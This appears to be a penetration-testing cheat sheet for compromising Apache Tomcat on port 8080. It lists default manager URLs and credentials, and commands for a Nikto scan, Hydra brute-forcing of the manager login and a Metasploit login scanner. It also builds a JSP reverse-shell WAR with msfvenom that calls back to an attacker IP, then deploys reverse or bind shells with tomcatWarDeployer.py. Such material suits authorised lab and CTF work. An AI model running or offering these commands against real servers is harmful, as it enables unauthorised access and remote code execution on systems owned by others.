Tomcat 8080

1. Check Default Directories

http://10.10.10.10:8080/manager
http://10.10.10.10:8080/manager.html

2. Check for Default Credentials

• Apache Tomcat Default Passwords

Some of the common usernames and passwords are:

• Username List: admin, tomcat, manager, root

• Password List: manager, password, root, tomcat, s3cret

3. Run Nikto Scan

nikto -h http://10.10.10.10:8080

4. Generate Reverse Shell Payload

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war

5. Brute Force with Hydra

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html

6. Using tomcatWarDeployer.py for Upload

The tomcatWarDeployer.py script can automate the process of uploading and deploying a reverse shell .war file to Tomcat. Clone the repository and use the script as follows:

sudo git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer

To deploy a reverse shell:

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:8080/manager/html/

• <username>: The username for authentication.

• <password>: The password for authentication.

• <ATTACKER_IP>: Your attacker's IP.

• <ATTACKER_PORT>: The port you want the reverse shell to connect to.

• <VICTIM_IP>: The target's IP address.

For a bind shell instead of a reverse shell:

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <VICTIM_IP>:8080/manager/html/

7. Metasploit Scanner for Tomcat

Metasploit has an auxiliary scanner that can quickly check for Tomcat Manager login vulnerabilities:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.10.10.10
set USERNAME tomcat
set PASSWORD password
run